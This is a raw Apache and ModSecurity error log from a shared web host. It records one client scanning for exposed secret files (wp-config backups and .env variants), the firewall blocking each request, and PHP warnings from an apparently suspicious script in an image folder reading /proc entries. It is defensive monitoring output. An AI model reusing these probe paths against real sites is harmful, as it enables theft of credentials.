[Mon May 11 11:37:56.082253 2026] [ssl:error] [pid 1256241:tid 1256250] (EAI 2)Name or service not known: [client 116.202.235.23:45196] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:37:56.082486 2026] [ssl:error] [pid 1256241:tid 1256250] AH01941: stapling_renew_response: responder error
[Mon May 11 11:37:56.196463 2026] [ssl:error] [pid 1254133:tid 1254148] (EAI 2)Name or service not known: [client 116.202.235.23:45206] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:37:56.196592 2026] [ssl:error] [pid 1254133:tid 1254148] AH01941: stapling_renew_response: responder error
[Mon May 11 11:37:56.268762 2026] [ssl:error] [pid 1254328:tid 1254347] (EAI 2)Name or service not known: [client 116.202.235.23:45212] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:37:56.268892 2026] [ssl:error] [pid 1254328:tid 1254347] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790180/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790180/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790180/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790180/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790180/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790180/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 11:38:00.648111 2026] [proxy:error] [pid 1254328:tid 1254339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 11:38:00.649609 2026] [proxy_http:error] [pid 1254328:tid 1254339] [client 31.32.194.37:63072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 11:38:00.759783 2026] [security2:error] [pid 1254179:tid 1254198] [client 31.32.194.37:10224] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agGjeGS6k_SCYd1AVZqqPQAAARE"]
[Mon May 11 11:38:00.761118 2026] [security2:error] [pid 1254179:tid 1254198] [client 31.32.194.37:10224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agGjeGS6k_SCYd1AVZqqPQAAARE"]
[Mon May 11 11:38:00.761445 2026] [security2:error] [pid 1254179:tid 1254198] [client 31.32.194.37:10224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agGjeGS6k_SCYd1AVZqqPQAAARE"]
[Mon May 11 11:38:01.137294 2026] [proxy:error] [pid 1254179:tid 1254198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 11:38:01.137417 2026] [proxy_http:error] [pid 1254179:tid 1254198] [client 31.32.194.37:10224] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 11:38:11.271908 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:8888] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /user/wp-config.bak_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/user/wp-config.bak_old"] [unique_id "agGjg5kIEwRJMyDaV55KLAAAAUY"]
[Mon May 11 11:38:11.272573 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:8888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/user/wp-config.bak_old"] [unique_id "agGjg5kIEwRJMyDaV55KLAAAAUY"]
[Mon May 11 11:38:13.475080 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:8888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjg5kIEwRJMyDaV55KLAAAAUY"]
[Mon May 11 11:38:13.503008 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:20044] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /user/wp-config.bak_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/user/wp-config.bak_old"] [unique_id "agGjhRjZymfuKpjWXeh4fgAAANg"]
[Mon May 11 11:38:13.503317 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:20044] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/user/wp-config.bak_old"] [unique_id "agGjhRjZymfuKpjWXeh4fgAAANg"]
[Mon May 11 11:38:14.729895 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:20044] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjhRjZymfuKpjWXeh4fgAAANg"]
[Mon May 11 11:38:14.756259 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:20058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/.env.tmp.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/usr/.env.tmp.test"] [unique_id "agGjhmS6k_SCYd1AVZqqSAAAAQQ"]
[Mon May 11 11:38:14.756483 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:20058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/usr/.env.tmp.test"] [unique_id "agGjhmS6k_SCYd1AVZqqSAAAAQQ"]
[Mon May 11 11:38:15.981048 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:20058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjhmS6k_SCYd1AVZqqSAAAAQQ"]
[Mon May 11 11:38:16.007181 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:20072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/.env.tmp.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/usr/.env.tmp.test"] [unique_id "agGjiJkIEwRJMyDaV55KMAAAAU4"]
[Mon May 11 11:38:16.007715 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:20072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/usr/.env.tmp.test"] [unique_id "agGjiJkIEwRJMyDaV55KMAAAAU4"]
[Mon May 11 11:38:17.491624 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:20072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjiJkIEwRJMyDaV55KMAAAAU4"]
[Mon May 11 11:38:23.608795 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:33604] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /utils/.env.backup_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/utils/.env.backup_staging"] [unique_id "agGjjxjZymfuKpjWXeh4jQAAAMU"]
[Mon May 11 11:38:23.609013 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:33604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/utils/.env.backup_staging"] [unique_id "agGjjxjZymfuKpjWXeh4jQAAAMU"]
[Mon May 11 11:38:24.767386 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:33604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjjxjZymfuKpjWXeh4jQAAAMU"]
[Mon May 11 11:38:24.792827 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:33620] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /utils/.env.backup_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/utils/.env.backup_staging"] [unique_id "agGjkJkIEwRJMyDaV55KPgAAAUw"]
[Mon May 11 11:38:24.793172 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:33620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/utils/.env.backup_staging"] [unique_id "agGjkJkIEwRJMyDaV55KPgAAAUw"]
[Mon May 11 11:38:26.019698 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:33620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjkJkIEwRJMyDaV55KPgAAAUw"]
[Mon May 11 11:38:26.045829 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.177.72.9:33624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /utils/.env.development.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/utils/.env.development.prod"] [unique_id "agGjkr4KNmD_mZ_vlf80MgAAAEc"]
[Mon May 11 11:38:26.046083 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.177.72.9:33624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/utils/.env.development.prod"] [unique_id "agGjkr4KNmD_mZ_vlf80MgAAAEc"]
[Mon May 11 11:38:27.208909 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.177.72.9:33624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjkr4KNmD_mZ_vlf80MgAAAEc"]
[Mon May 11 11:38:27.235226 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:33626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /utils/.env.development.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/utils/.env.development.prod"] [unique_id "agGjk0YQeUtAPynIs6xUCAAAAAw"]
[Mon May 11 11:38:27.235438 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:33626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/utils/.env.development.prod"] [unique_id "agGjk0YQeUtAPynIs6xUCAAAAAw"]
[Mon May 11 11:38:28.468377 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:33626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjk0YQeUtAPynIs6xUCAAAAAw"]
[Mon May 11 11:38:28.494883 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:33628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /utils/.env.save_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/utils/.env.save_test"] [unique_id "agGjlEYQeUtAPynIs6xUCQAAAAE"]
[Mon May 11 11:38:28.495357 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:33628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/utils/.env.save_test"] [unique_id "agGjlEYQeUtAPynIs6xUCQAAAAE"]
[Mon May 11 11:38:29.673530 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:33628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjlEYQeUtAPynIs6xUCQAAAAE"]
[Mon May 11 11:38:29.699809 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:33640] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /utils/.env.save_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/utils/.env.save_test"] [unique_id "agGjlWS6k_SCYd1AVZqqWgAAAQU"]
[Mon May 11 11:38:29.700170 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:33640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/utils/.env.save_test"] [unique_id "agGjlWS6k_SCYd1AVZqqWgAAAQU"]
[Mon May 11 11:38:30.928892 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:33640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjlWS6k_SCYd1AVZqqWgAAAQU"]
[Mon May 11 11:38:38.595907 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:39366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env.debug.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/v1/.env.debug.old"] [unique_id "agGjnkRdw2n9wv6Ai48DvQAAAJI"]
[Mon May 11 11:38:38.596115 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:39366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/v1/.env.debug.old"] [unique_id "agGjnkRdw2n9wv6Ai48DvQAAAJI"]
